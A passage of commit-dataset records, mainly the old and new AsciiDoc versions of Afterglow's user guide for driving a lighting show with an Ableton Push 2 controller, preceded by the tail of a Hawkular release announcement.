stats,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png\"]\nendif::[]\n\n== More details for URLs\n\nHawkular now also collects the current IP address and the server information for the URLs being monitored\n\n[[img-url-detail]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png[URL details,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png[URL details,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png\"]\nendif::[]\n\n\n== Notable changes in this release were:\n\n\n* Implement more app server details as mentioned above\n* Upgrade underlying versions of Hawkular-Metrics and other subsystems\n* More alerting capabilities\n\nHead over to the link:\/releasenotes\/1.0.0.Alpha3.html[Full release notes] for more details.\n\n\n== Demo\n\nWe will again run a demonstration of the new Hawkular features link:https:\/\/plus.google.com\/events\/c1o2qnm1gof3iu45egshccq3hho[here].\n\nWe plan to do a lot more Alpha releases with even more features, the next Alpha is planned for August 26th, and\nlink:\/docs\/dev\/development.html[you can help us] :)\n\nThank you for the contributions!\n\n== Downloads\n\nYou can download the release here:\n\n* http:\/\/download.jboss.org\/hawkular\/hawkular\/1.0.0.Alpha3\/hawkular-dist-1.0.0.Alpha3.zip[Hawkular 1.0.0.Alpha3 (zip)]\n* http:\/\/download.jboss.org\/hawkular\/hawkular\/1.0.0.Alpha3\/hawkular-dist-1.0.0.Alpha3.tar.gz[Hawkular 1.0.0.Alpha3\n(tar.gz)]\n\n== What's next?\n\nDuring the weeks until the next release and demo we want to address the following:\n\n* More details of the application servers\n* Uploading of new applications into managed servers\n* More alerting related changes\n* An easiert to grasp resource naming schema\n* Hopefully definition of jdbc drivers and data sources\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75196bfc8aa1ba8fdc96b0f749e7dfb9bb6d5518","subject":"Fix inbound link.","message":"Fix inbound link.\n\nAlso clean up attributes section and fix footer using partial.\n","repos":"brunchboy\/afterglow,brunchboy\/afterglow,brunchboy\/afterglow","old_file":"doc\/modules\/ROOT\/pages\/push2.adoc","new_file":"doc\/modules\/ROOT\/pages\/push2.adoc","new_contents":"= Using Ableton Push 2\nJames Elliott <james@deepsymmetry.org>\n:toc:\n:toc-placement: preamble\n\nSome controllers have such rich capabilities that they deserve their\nown custom mapping implementations to exploit their capabilities as a\nshow control interface. The Push 2 called out for such treatment, and\nthankfully in March 2016 Ableton published\nhttps:\/\/github.com\/Ableton\/push-interface\/blob\/master\/doc\/AbletonPush2MIDIDisplayInterface.asc[documentation]\nwhich made that possible, and a\n{api-doc}afterglow.controllers.ableton-push-2.html[mapping] has been\ncreated. You can use it to do most of the things that you would use\nthe <<README#web-ui,web interface>> for, often with deeper control,\nsince you can press multiple cue trigger pads at the same time, and\nthey respond to variations in pressure.\n\nNOTE: Although this page discusses the second version of the Push\ncontroller, with a graphical display, there is also a page describing\nthe <<push#using-ableton-push,original Push mapping>>, which is still\nfully supported.\n\n## Binding to the Push 2\n\nAssuming you have an Ableton Push 2 connected to the machine running\nAfterglow and powered on, it will be noticed, identified, and\nactivated as soon as you have set up the sample show. You will see a\nbrief startup animation, and Afterglow's Push 2 interface will appear.\n\nTIP: For information about how to set up bindings without the sample\nshow, or more details about how it works, see\n<<mapping_sync#setting-up-grid-controller-bindings,Setting Up Grid\nController Bindings>>.\n\nHere is an overview of how the Push 2 mapping works, with details\nexplained in the upcoming sections:\n\nimage::Push2NoEffects.jpg[Push 2 interface]\n\nThe most exciting innovation that the Push 2 adds to the already\nexcellent Push experience is the color graphic display, and Afterglow\ncan take full advantage of it, as this example shows:\n\nimage::Example.gif[Afterglow graphic animation]\n\n[[show-control]]\n== Show Control\n\nOnce you have the Push 2 bound to a show, it becomes a very direct and\ntactile way to monitor and control the cues and other aspects of the\nshow.\n\nThe graphical display at the top of the Push displays the effects\ncurrently running, and can optionally display\n<<metronome-control,metronome>> information as well. If a cue was\ndefined with adjustable variables for its effect, they will also be\ndisplayed, and you will be able to <<effect-control,adjust>> them by\nturning the encoder above the variable.\n\nThe rightmost encoder, past the display, adjusts the show Grand\nMaster, which controls the maximum brightness that any dimmer cue can\nachieve, so you can always use it to adjust the overall brightness of\nthe show. As soon as you touch the encoder, the Grand Master level\nwill appear along with a gauge representing what fraction of its\nmaximum level is currently in effect, and both will be updated as you\nturn the encoder. When you release it, the display returns to showing\nwhatever it was before.\n\nimage::GrandMaster2.jpg[Grand Master adjustment]\n\nAs with other numeric values that you can adjust, while you are\nadjusting the Grand Master, the touch strip on the left hand side of\nthe Push will light up in the same proportion as the circular gauge\nin the display under the encoder, and you can touch or drag on the\nstrip to instantly set the level to whatever value you want.\n\nThe red kbd:[▷] button to the at the bottom left of the cue grid\ncan be used to temporarily shut down the show, blacking out all\nuniverses that it controls, and suspending the processing of its\neffects.\n\nimage::ShowStop2.jpg[Show stopped]\n\nWhenever the show is stopped, the kbd:[▷] button turns green to\nrepresent \u201cPlay\u201d. Pressing it in this state restarts the show where it\nwould have been had it not stopped.\n\n== Cues\n\nMost of the space on the interface is dedicated to an 8×8 grid\nof color coded cue trigger pads, which provide a window onto the\nshow's overall <<cues#cues,cue grid>>. The Push 2 can be\n<<README#scrolling-and-linked-controllers,linked>> to the\n<<README#web-ui,web interface>> so that both always display the same\nsection of the cue grid, and the web interface can remind you of the\nnames of the cues you are looking at, or it can be scrolled\nindependently, allowing you access to more cues at the same time.\n\nTIP: If you have more than one compatible grid controller, you can\nhave Afterglow using all of them at the same time; each can be\nscrolled to different areas of the cue grid, and each can even be\nlinked to a different browser window if you have that much screen\nspace.\n\nYou can activate any cue shown by pressing its pad; running cues will\nlight up, and darken again when they end. The effects which cues\ncreate will also appear in the display above the cue pad, from left to\nright, with the most recent effect on the right. The labels containing\nthe effect name are drawn in the same color as the cue pad used to\nlaunch the effect, to help keep track of which is which. In the photo\nbelow, “Sparkle” is the most recent effect, and it has two\nvariables, `chance` and `Fade`, which can be adjusted by turning the\nencoders above them. The `chance` value is changing because it is\nconfigured to also be adjusted through the pressure sensitive cue pad\nthat was used to launch it.\n\nimage::SparklePressure2.jpg[Sparkle effect, ajusting chance variable]\n\nTo stop a running cue, press its pad again, or press the red kbd:[End]\npad underneath its effect entry in the display. Some cues will end\nimmediately, others will continue to run until they reach what they\nfeel is an appropriate stopping point. While they are in the process\nof ending, the cue pad will blink, and the kbd:[End] pad will be\nlabeled kbd:[Ending]. If you want the cue to end immediately even\nthough it would otherwise run for a while longer, you can press the\nblinking cue pad (or effect kbd:[Ending] pad) again and it will be\nkilled right then.\n\nThe colors assigned to cue pads by the creator of the cue grid are\nintended to help identify related cues. The same color is used in the\ncue label at the bottom of the graphical display, to help keep track\nof which cue came from where.\n\nSome cues (especially intense ones like strobes) are configured to run\nonly as long as they are held down. In that case, when you press cue\npad, it lights up with a whitened version of the cue color as a hint\nthat this is happening, and as soon as you release the pad, the cue\nwill end. If you want to override this behavior, you can hold down the\nkbd:[Shift] button (towards the bottom right of the Push) as you press\nthe cue pad, and it will activate as a normal cue, staying on until\nyou press its pad a second time.\n\nAs noted above, cues can also be configured to take advantage of the\npressure sensitivity of the Push cue pads, so that as you vary the\npressure with which you are holding down the pad, some visible\nvariable of the cue is altered. The strobe and sparkle cues in\ncreated by\n{api-doc}afterglow.examples.html#var-make-cues[`afterglow.examples\/make-cues`]\nfor the sample show work this way: the intensity and lightness of the\nstrobe are increased by pressure, and so is the chance that a sparkle\nwill be assigned to a light on each frame. You can see these\nvariables change in the display above the cue's effect name while\nyou are adjusting them, as shown in the photo above.\n\n[[exclusivity]]Cues may be mutually exclusive by nature, and if they\nwere created to reflect this (by using the same keyword to register\ntheir effects with the show, or specifying other effect keys in their\n`:end-keys` list), when you activate one, the other cues which use the\nsame keyword are dimmed. This is a hint that when you activate one of\nthem, it will _replace_ the others, rather than running at the same\ntime. In the photo <<gobo-photo,below>>, the rest of the\nTorrent 1 fixed gobo cues (the leftmost blue cues) are dimmed because\nthey would replace the running “T1 atom shake” cue.\n\n== Scrolling\n\nThe show will likely have many more cues than fit on the pad grid; the\ndiamond of arrow buttons to the right of the top of the cue grid allow\nyou to page through the larger show grid. If there are more cues\navailable in a given direction, that arrow will be lit, otherwise it\nis dark. Pressing an active arrow scrolls the view one\n“page” in that direction. In the photo below, it is\ncurrently possible to scroll up and to the right:\n\nimage::PushScroll2.jpg[Push 2 scroll diamond,286]\n\nIf you hold down the kbd:[Shift] button, the arrows will scroll you as\nfar as possible in the direction that you press.\n\nThe kbd:[Page <] and kbd:[> Page] buttons (toward the bottom right,\njust above kbd:[Shift]) allow you to scroll the graphical display left\nand right, to see and <<effect-control,adjust>> all of the currently\nrunning effects, even though only four at a time (or three, if the\n<<metronome-control,metronome section>> is showing) fit in the\ndisplay.\n\nPressing the kbd:[Page <] scrolls the display left, showing you older\n(or lower priority) effects, and kbd:[> Page] scrolls to the right,\nshowing you newer and higher priority effects. Pressing these buttons\nwhile kbd:[Shift] is held will scroll as far as possible in the\ncorresponding direction. (As illustrated in the photo below, in\naddition to lighting up the kbd:[Page <] and kbd:[> Page] buttons when\nthere are effects off the screen in that direction, Afterglow draws\n`<` and `>` markers below the effect name labels at the corresponding\nedge of the screen.)\n\nimage::Push2Page.jpg[Push 2 page arrows]\n\n== Effect Control\n\nEffects, whether created by cues or other code, appear in the display\narea, and can be scrolled through and ended by pressing the\ncorresponding red kbd:[End] pad which appears underneath them. There\nare many ways you can interact with running effects:\n\n=== Numeric Cue Variables\n\nIf the effect was created by a cue that has numeric variables assigned\nto it, the variable names and values will appear above the effect\nname. The values can be adjusted using the encoder knob above the\nvariable. For example, in addition to varying the sparkle `chance`\nvariable using the pad pressure, as was done above, its `Fade`\nvariable can be adjusted using the effect variable encoder above it.\nAs soon as you touch the encoder knob associated with a variable, the\ngauge underneath its value brightens to indicate that you are\nadjusting it, and updates as you turn the encoder to change the value.\nIn the photo below, the `Confetti Dance` cue's `Min Last` variable is\nbeing adjusted.\n\nimage::AdjustingConfetti.jpg[Adjusting Min Last variable,693]\n\nAnd here is how the effect's display section updates while the value\nis being adjusted:\n\nimage::min-last.gif[Adjusting Min Last Animation]\n\nWhile you are adjusting the variable, the large touch strip on the\nleft hand side of the Push lights up to show you where you are in the\nvariable range, and you can touch and drag on the strip to instantly\nset the variable to another value.\n\nimage::AdjustingConfetti2.jpg[Adjusting and touch strip]\n\nMost numeric variables will have values that grow from the bottom of\nthe touch strip, but variables marked as `:centered` when created,\nlike Pan and Tilt, grow from the center up or down. (Their graphical\ngauges grow from the center as well.)\n\nimage::AdjustingCentered2.jpg[Adjusting centered cue variables]\n\nimage::pan-tilt.gif[Adjusting centered variable animation]\n\nIf an effect has only one adjustable variable, it will take up the\nentire effect area, and you can use either encoder to adjust it, as\nwhen adjusting a gobo shaking <<cues#creating-function-cues,function\ncue>> for the Torrent moving head spot:\n\nimage::AdjustingShake.jpg[Adjusting gobo shake cue]\n\nWhen you release the encoder knob, the adjustment graph returns to its\nnormal brightness, and the touch strip deactivates.\n\nThis photo also illustrates the dimming of incompatible cues discussed\n<<exclusivity,above>>: The leftmost columns of blue cues all establish\nsettings for the fixed gobo wheel of one of the Torrent moving-head\nspots. Since one of them is active (the `T1 atom shake` effect being\nadjusted corresponds to the bright blue button three rows down the\nsecond column), the others are dimmed to hint that pressing them would\nreplace the active cue.\n\nThis dimming can also be seen in the web interface view of the cue grid:\n\n[[gobo-photo]]\nimage::GoboCues.png[Gobo cues]\n\n=== Boolean Cue Variables\n\nIf a cue has Boolean variables assigned to it, they will also appear\nabove the effect name, with the current value showing as `Yes` or\n`No`. To adjust them you also start by grabbing the closest encoder.\nWith a Boolean value, the adjustment graph is always half full, and\nyou rotate it to the left for No, or right for Yes:\n\nimage::AdjustingDown2.jpg[Adjusting a Down? cue variable]\n\nNOTE: The `Blade Saw` cue in the photo is also an example of a cue\nthat defines a custom visualization. Underneath its variable gauges,\nit draws an animated view of the previous and upcoming measure of\ntime, with down beats marked in red as they are in the Metronome\nsection. The visualization is a strip chart showing the dimmer level\nthat the cue will establish at each point in time. As you adjust the\ncue variables, the visualization instantly updates to reflect your\nchanges, helping you understand how they affect it.\n\nimage::blade-saw.gif[Cue visualization animation]\n\nYou can also use the touch strip when setting a Boolean variable;\ntouching the top half sets it to `Yes`, while the bottom half sets it to\n`No`.\n\nimage::AdjustingDown2Strip.jpg[Adjusting a Down? cue with the touch strip visible]\n\nNOTE: The `Rainbow Pulse` cue to the left of the one being adjusted is\nan example of a cue with no variables to adjust.\n\n=== Color Cue Variables\n\nIf a cue has color variables assigned to it, they will also appear\nabove the effect name. The currently assigned color value will be\ndisplayed as swatch and a six digit hexadecimal number, representing\nthe eight bit red, green, and blue representation of the color value,\n#rrggbb. In this photo, a `Color all` cue with a color variable that\nstarts out white has just been launched:\n\nimage::ColorParam2.jpg[Cue with color variable]\n\nWhen an effect is displaying a color cue variable, the gauges beneath\nit represent hue and saturation values. (If the cue has only one\nvariable, both of these will always be visible. Otherwise, only the\none underneath the variable's encoder will be visible until you start\nadjusting that variable, at which point the other color gauge will\nappear.)\n\nTouching the associated encoder will open up a special color selection\ninterface, which takes over the entire cue grid, as well as the effect\ncell:\n\nimage::ColorPalette2.jpg[Color adjustment palette]\n\nIn addition to adjusting the color's hue and saturation using the\nencoders above the effect, you can instantly jump to a color by\ntapping any of the pads in the grid, which form a palette of four\nsaturation levels of hues spread across the rainbow. The four pads on\nthe bottom right let you select white, medium gray, and black as color\nvalues as well, and the last pad displays a preview of the currently\nselected color, rather than doing anything when you press it.\n\nIf any pad other than the preview pad matches the currently selected\ncolor, it blinks (regardless of whether you chose that color by\npressing the pad or by turning the encoders).\n\nWhile you are holding the hue or saturation encoder, you can also use\nthe touch strip to see and jump to any value in that encoder's range.\nIf both encoders are being held, the touch pad allows you to select\nsaturations, since the touch pads already give you an easy interface\nfor selecting hues.\n\nimage::color-all.gif[Color selection animation]\n\nAs soon as you let go of both the hue and saturation encoders, the\npalette disappears and the normal cue grid returns.\n\n=== Scrolling Through Cue Variables\n\nIf a cue has more than two variables, even though you can only see two\nat a time on the Push, you can still check and adjust all of them.\nWhenever there are too many to fit, the rightmost pad just below the\neffect display will be lit white and labeled kbd:[Next Vars >] as shown below:\n\nimage::MoreVars2.jpg[More than Two Cue Variables]\n\nIn the photo, the `Torrent Sine` and `Blade Triangle` cues have more\nvariables than are being displayed, while the `Color all` cue does\nnot.\n\nEach time you press a kbd:[Next Vars >] button, you will see the next\ntwo variables assigned to the cue. Once you reach the end of the list,\nit wraps back to the beginning. Grabbing an encoder above the\nvariables will adjust whichever variable is currently displayed\nbeneath it. (While you are holding encoders to adjust an effect's\nvariables, its kbd:[Next Vars >] button will be blacked out and\ndisabled.)\n\n=== Saving Cues\n\nIf you have made any adjustments to cue variable values, these are\nnormally discarded when you end the cue; the next time it begins, it\nstarts with the values that were configured in the show. You can\nchange that by saving the cue's variables. To begin, hold down the\nkbd:[◯] button near the bottom left of the Push 2:\n\nimage::Saving2.jpg[Saving Cue Variables]\n\nWhile this button is held down, the red kbd:[End] buttons beneath the\neffect list disappear, and are replaced with the cue saving interface.\nIf you have made any adjustments to a cue's variables since it was\nstarted, a green kbd:[Save] button will appear (like the one beneath\nthe `Color all` effect in the photo above). Pressing that will save\nthe adjustments you made, so the next time you launch the cue, the\nadjusted values will be used.\n\nWhen you save a color cue that is configured like the ones in the\nsample show, the color of the cue's pad in the cue grid is updated to\nreflect the new color you have chosen. (Its color in the the web\ninterface cue grid is updated as well).\n\nOnce you have saved a cue's variables, while it is running, instead of\na green kbd:[Save] button, you will see an amber kbd:[Clear] button\n(like the one beneath the `Torrent Sine` effect in the photo).\nPressing that will remove the saved values, so the cue goes back to\nits original configuration.\n\nIf you save a cue's variables, and then adjust them further, the\nkbd:[Save] button returns, allowing you to save your new values. If\nyou don't, the values you saved earlier will be used the next time you\nstart the cue.\n\nIf a cue's variables have neither been saved nor adjusted, no\nkbd:[Save] or kbd:[Update] button appears (like for the `Blade\nTriangle` effect in the photo). Of course, while saving cues, you can\nstill scroll though their variables using the kbd:[Next Vars >]\nbuttons.\n\nOnce you release the kbd:[◯] button, the save interface goes\naway, and the effect kbd:[End] buttons return.\n\nimage::save-clear.gif[Save interface animation]\n\n== Metronome Control\n\nThe top left section of the Push lets you view and adjust the\nMetronome that the show is using to keep time with the music that is\nbeing played. Since Afterglow's effects are generally defined with\nrespect to the metronome, it is important to keep it synchronized with\nthe music. When active, the metronome section takes over the leftmost\nquarter of the graphical display (so there are room to see only three\neffects, rather than the normal four). To toggle the metronome\nsection, press the kbd:[Metronome] button. It will appear if it was\nnot showing, and disappear if it was there. The kbd:[Metronome] button\nis lit more brightly when the section is active.\n\nThe metronome section shows the current speed, in Beats Per Minute, of\nthe metronome, and the kbd:[Tap Tempo] button label flashes at each beat\n(this flashing happens regardless of whether the metronome section is\nvisible in the text area). The metronome section also shows you the\ncurrent phrase number, the bar within that phrase, and the beat within\nthat bar which has been reached.\n\nimage::Metronome2.png[Metronome section]\n\nFinally, below the beat and BPM displays, there is a visualization of\nthe passing beats, bars, and phrases. The beats are drawn in white,\nwith their phase increasing until the next beat hits. In a layer\nbeneath them, the measures (bars) are drawn in red, and beneath those,\nthe phrases in blue. The current moment in time is centered in the\nvisualization with a stationary line to mark it, and there is room for\none measure before and after the line. A full phrase doesn't fit, but\nyou can see its phase gradually growing until it ends.\n\nimage::metronome-phrase.gif[One phrase of metronome animation]\n\nThe most basic way of synchronizing the metronome is to tap the\nkbd:[Tap Tempo] button at each beat of the music. Tapping the button\naligns the metronome to a beat, and if you tap it three or more times\nwithin two seconds of each preceding tap, sets the metronome's BPM.\nTap it as you hear each beat of the music, and after three or more\ntaps, the speed of the metronome will be approximately synchronized\nwith the music.\n\nOnce the tempo is correct, you can tell Afterglow which beat is the\ndown beat by holding down the kbd:[Shift] button while pressing\nkbd:[Tap Tempo]. This combination does not change the tempo, but tells\nAfterglow that the moment when you tapped the button is the down beat\n(the first beat of a bar).\n\nYou can also adjust the BPM by turning the BPM encoder, which is the\nencoder right above the kbd:[Metronome] button:\n\nimage::Push2BPM.jpg[BPM encoder]\n\nWhile you are holding this encoder, the BPM gauge brightens, along\nwith the BPM digit after the decimal point, as a visual reminder of\nwhat value you are adjusting. Turning the encoder clockwise raises the\nBPM, turning counterclockwise lowers it. While the metronome section\nis showing, you can also use the encoder above the BPM value to adjust\nit. But you can grab the dedicated BPM encoder above the\nkbd:[Metronome] button even when the metronome section is not showing,\nand it will appear while you have the encoder in your hand, so you can\nadjust the BPM quickly, and then get back to what you were doing.\n\nIf you press the kbd:[Shift] button, the BPM encoder can be used to\nadjust the BPM by whole beats rather than tenths. While kbd:[Shift] is\ndown, the BPM value before the decimal point will be brightened,\nrather than the digit after it, and the BPM will change ten times as\nquickly when you turn it. You can switch back and forth in the middle\nof your adjustments by pressing and releasing the shift key at any\ntime.\n\nimage::bpm-adjustment.gif[BPM adjustment animation]\n\nIn order to make longer chases and effects line up properly with the\nmusic, you will also want to make sure the count is right, that the\nbeat number shows `1` on the down beat, and that the bar numbers are\nright as well, so that the start of a phrase is reflected as bar\nnumber `1`. In addition to using kbd:[Shift] with kbd:[Tap Tempo] to\nset the down beat, you can adjust the current beat number using the\nbeat encoder, the encoder above the kbd:[Tap Tempo] button:\n\nimage::Push2Beat.jpg[Beat encoder]\n\nWhile you are holding this encoder, an endless circular gauge appears\nbelow the beat information, and the beat number is brightened, as a\nvisual reminder of what value you are adjusting. Turning the encoder\nclockwise jumps to the next beat, turning counterclockwise jumps back\nto the previous one. As a tactile reminder that you are adjusting\nwhole beats, this encoder moves with a distinct click as it changes\nvalue, while the BPM encoder turns smoothly as you scroll through\nfractional BPM values.\n\nWhile the metronome section is showing, you can also use the encoder\nabove the Beat value to adjust it. But you can grab the dedicated Beat\nencoder above the kbd:[Tap Tempo] button even when the metronome\nsection is not showing, and it will appear while you have the encoder\nin your hand, so you can adjust the beat number quickly, and then get\nback to what you were doing.\n\nIf you press the kbd:[Shift] button, the Beat encoder can be used to\nadjust the current bar within the phrase instead of the current beat.\nWhile kbd:[Shift] is down, the bar will be brightened instead of the\nbeat, and turning the encoder will jump that value forwards or\nbackwards:\n\nimage::beat-adjustment.gif[Beat adjustment animation]\n\nIf you know a phrase is about to begin, you can press the red\nkbd:[Reset] button in the metronome section right as it does. This\nwill reset the count to Phrase 1, Bar 1, Beat 1.\n\nTrying to keep up with tempo changes during dynamic shows can be\ntedious, so you will hopefully be able to take advantage of\nAfterglow's metronome synchronization features. If the DJ can send you\n<<mapping_sync#syncing-to-midi-clock,MIDI clock pulses>>, or you can\nconnect via a Local Area Network to Pioneer professional DJ gear to\nlock into the beat grid established by\n<<mapping_sync#syncing-to-pro-dj-link,Pro DJ Link>>, Afterglow can\nkeep the BPM (with MIDI) and even the beats (with Pro DJ Link and the\nTraktor Afterglow Beat Phase\n<<mapping_sync#syncing-to-traktor-beat-phase,controller mapping>>)\nsynchronized for you. The Sync button in the Metronome section\n(showing kbd:[Manual] sync in these photos) will eventually allow you to\nset this up, but that is not yet implemented, so for now you will need\nto use the <<README#metronome-control,web interface>> to configure it.\n\nNOTE: The button does already change color to let you know the sync\nstatus: amber means manual, green means successful automatic sync, and\nred means a requested automatic sync has failed. It is likely that a\nfuture release of Afterglow will let you press this button to choose\nyour sync source.\n\nOnce your sync is established, the meaning of the kbd:[Tap Tempo]\nbutton changes. If you are using MIDI clock to sync the BPM, it\nbecomes a kbd:[Tap Beat] button, which simply establishes where the\nbeat falls. If you are locked in to a Pro DJ Link beat grid or using\nthe Traktor beat phase mapping, the beats are automatically aligned\nfor you so, it becomes a kbd:[Tap Bar] button which, when pressed,\nindicates that the current beat is the down beat (start) of a bar.\n(Similarly, if you press the metronome kbd:[Reset] pad while synced to\na Pro DJ Link beat grid or Traktor beat phase, the beat itself will\nnot move, but the beat closest to when you pressed the pad will be\nidentified as Beat 1.) In these sync modes you can also use the\nkbd:[Shift] button to align at the next bigger boundary: If tapping\nwould normally move the bar, shift-tapping will move the phrase.\n\nIf you try to adjust the BPM encoder while sync is active, it will\nhave no effect, and Afterglow will point at the sync mode to explain\nwhy it is ignoring your adjustments.\n\n=== Sharing the Push 2\n\nIf you are using Afterglow at the same time as Ableton Live, you can\nswitch back and forth between which has control of the Push by\npressing the kbd:[User] button. If Live is not running when you press\nkbd:[User], the Push interface will simply go blank (except for the\nkbd:[User] button itself), until you press it again, at which point\nAfterglow will light it up.\n\nNOTE: Future releases will take advantage of more of the buttons on\nthe controller.\n\ninclude::partial$Footer.adoc[]\n","old_contents":"= Using Ableton Push 2\nJames Elliott <james@deepsymmetry.org>\n:icons: font\n:experimental:\n:toc:\n:toc-placement: preamble\n:api-doc: http:\/\/deepsymmetry.org\/afterglow\/api-doc\/\n\n\/\/ Set up support for relative links on GitHub, and give it\n\/\/ usable icons for admonitions, w00t! Add more conditions\n\/\/ if you need to support other environments and extensions.\nifdef::env-github[]\n:outfilesuffix: .adoc\n:tip-caption: :bulb:\n:note-caption: :information_source:\n:important-caption: :heavy_exclamation_mark:\n:caution-caption: :fire:\n:warning-caption: :warning:\nendif::[]\n\nSome controllers have such rich capabilities that they deserve their\nown custom mapping implementations to exploit their capabilities as a\nshow control interface. The Push 2 called out for such treatment, and\nthankfully in March 2016 Ableton published\nhttps:\/\/github.com\/Ableton\/push-interface\/blob\/master\/doc\/AbletonPush2MIDIDisplayInterface.asc[documentation]\nwhich made that possible, and a\n{api-doc}afterglow.controllers.ableton-push-2.html[mapping] has been\ncreated. You can use it to do most of the things that you would use\nthe <<README#web-ui,web interface>> for, often with deeper control,\nsince you can press multiple cue trigger pads at the same time, and\nthey respond to variations in pressure.\n\nNOTE: Although this page discusses the second version of the Push\ncontroller, with a graphical display, there is also a page describing\nthe <<push#using-ableton-push,original Push mapping>>, which is still\nfully supported.\n\n## Binding to the Push 2\n\nAssuming you have an Ableton Push 2 connected to the machine running\nAfterglow and powered on, it will be noticed, identified, and\nactivated as soon as you have set up the sample show. You will see a\nbrief startup animation, and Afterglow's Push 2 interface will appear.\n\nTIP: For information about how to set up bindings without the sample\nshow, or more details about how it works, see\n<<mapping_sync#setting-up-grid-controller-bindings,Setting Up Grid\nController Bindings>>.\n\nHere is an overview of how the Push 2 mapping works, with details\nexplained in the upcoming sections:\n\nimage::Push2NoEffects.jpg[Push 2 interface]\n\nThe most exciting innovation that the Push 2 adds to the already\nexcellent Push experience is the color graphic display, and Afterglow\ncan take full advantage of it, as this example shows:\n\nimage::Example.gif[Afterglow graphic animation]\n\n== Show Control\n\nOnce you have the Push 2 bound to a show, it becomes a very direct and\ntactile way to monitor and control the cues and other aspects of the\nshow.\n\nThe graphical display at the top of the Push displays the effects\ncurrently running, and can optionally display\n<<metronome-control,metronome>> information as well. If a cue was\ndefined with adjustable variables for its effect, they will also be\ndisplayed, and you will be able to <<effect-control,adjust>> them by\nturning the encoder above the variable.\n\nThe rightmost encoder, past the display, adjusts the show Grand\nMaster, which controls the maximum brightness that any dimmer cue can\nachieve, so you can always use it to adjust the overall brightness of\nthe show. As soon as you touch the encoder, the Grand Master level\nwill appear along with a gauge representing what fraction of its\nmaximum level is currently in effect, and both will be updated as you\nturn the encoder. When you release it, the display returns to showing\nwhatever it was before.\n\nimage::GrandMaster2.jpg[Grand Master adjustment]\n\nAs with other numeric values that you can adjust, while you are\nadjusting the Grand Master, the touch strip on the left hand side of\nthe Push will light up in the same proportion as the circular gauge\nin the display under the encoder, and you can touch or drag on the\nstrip to instantly set the level to whatever value you want.\n\nThe red kbd:[▷] button to the at the bottom left of the cue grid\ncan be used to temporarily shut down the show, blacking out all\nuniverses that it controls, and suspending the processing of its\neffects.\n\nimage::ShowStop2.jpg[Show stopped]\n\nWhenever the show is stopped, the kbd:[▷] button turns green to\nrepresent \u201cPlay\u201d. Pressing it in this state restarts the show where it\nwould have been had it not stopped.\n\n== Cues\n\nMost of the space on the interface is dedicated to an 8×8 grid\nof color coded cue trigger pads, which provide a window onto the\nshow's overall <<cues#cues,cue grid>>. The Push 2 can be\n<<README#scrolling-and-linked-controllers,linked>> to the\n<<README#web-ui,web interface>> so that both always display the same\nsection of the cue grid, and the web interface can remind you of the\nnames of the cues you are looking at, or it can be scrolled\nindependently, allowing you access to more cues at the same time.\n\nTIP: If you have more than one compatible grid controller, you can\nhave Afterglow using all of them at the same time; each can be\nscrolled to different areas of the cue grid, and each can even be\nlinked to a different browser window if you have that much screen\nspace.\n\nYou can activate any cue shown by pressing its pad; running cues will\nlight up, and darken again when they end. The effects which cues\ncreate will also appear in the display above the cue pad, from left to\nright, with the most recent effect on the right. The labels containing\nthe effect name are drawn in the same color as the cue pad used to\nlaunch the effect, to help keep track of which is which. In the photo\nbelow, “Sparkle” is the most recent effect, and it has two\nvariables, `chance` and `Fade`, which can be adjusted by turning the\nencoders above them. The `chance` value is changing because it is\nconfigured to also be adjusted through the pressure sensitive cue pad\nthat was used to launch it.\n\nimage::SparklePressure2.jpg[Sparkle effect, ajusting chance variable]\n\nTo stop a running cue, press its pad again, or press the red kbd:[End]\npad underneath its effect entry in the display. Some cues will end\nimmediately, others will continue to run until they reach what they\nfeel is an appropriate stopping point. While they are in the process\nof ending, the cue pad will blink, and the kbd:[End] pad will be\nlabeled kbd:[Ending]. If you want the cue to end immediately even\nthough it would otherwise run for a while longer, you can press the\nblinking cue pad (or effect kbd:[Ending] pad) again and it will be\nkilled right then.\n\nThe colors assigned to cue pads by the creator of the cue grid are\nintended to help identify related cues. The same color is used in the\ncue label at the bottom of the graphical display, to help keep track\nof which cue came from where.\n\nSome cues (especially intense ones like strobes) are configured to run\nonly as long as they are held down. In that case, when you press cue\npad, it lights up with a whitened version of the cue color as a hint\nthat this is happening, and as soon as you release the pad, the cue\nwill end. If you want to override this behavior, you can hold down the\nkbd:[Shift] button (towards the bottom right of the Push) as you press\nthe cue pad, and it will activate as a normal cue, staying on until\nyou press its pad a second time.\n\nAs noted above, cues can also be configured to take advantage of the\npressure sensitivity of the Push cue pads, so that as you vary the\npressure with which you are holding down the pad, some visible\nvariable of the cue is altered. The strobe and sparkle cues in\ncreated by\n{api-doc}afterglow.examples.html#var-make-cues[`afterglow.examples\/make-cues`]\nfor the sample show work this way: the intensity and lightness of the\nstrobe are increased by pressure, and so is the chance that a sparkle\nwill be assigned to a light on each frame. You can see these\nvariables change in the display above the cue's effect name while\nyou are adjusting them, as shown in the photo above.\n\n[[exclusivity]]Cues may be mutually exclusive by nature, and if they\nwere created to reflect this (by using the same keyword to register\ntheir effects with the show, or specifying other effect keys in their\n`:end-keys` list), when you activate one, the other cues which use the\nsame keyword are dimmed. This is a hint that when you activate one of\nthem, it will _replace_ the others, rather than running at the same\ntime. In the photo <<gobo-photo,below>>, the rest of the\nTorrent 1 fixed gobo cues (the leftmost blue cues) are dimmed because\nthey would replace the running “T1 atom shake” cue.\n\n== Scrolling\n\nThe show will likely have many more cues than fit on the pad grid; the\ndiamond of arrow buttons to the right of the top of the cue grid allow\nyou to page through the larger show grid. If there are more cues\navailable in a given direction, that arrow will be lit, otherwise it\nis dark. Pressing an active arrow scrolls the view one\n“page” in that direction. In the photo below, it is\ncurrently possible to scroll up and to the right:\n\nimage::PushScroll2.jpg[Push 2 scroll diamond,286]\n\nIf you hold down the kbd:[Shift] button, the arrows will scroll you as\nfar as possible in the direction that you press.\n\nThe kbd:[Page <] and kbd:[> Page] buttons (toward the bottom right,\njust above kbd:[Shift]) allow you to scroll the graphical display 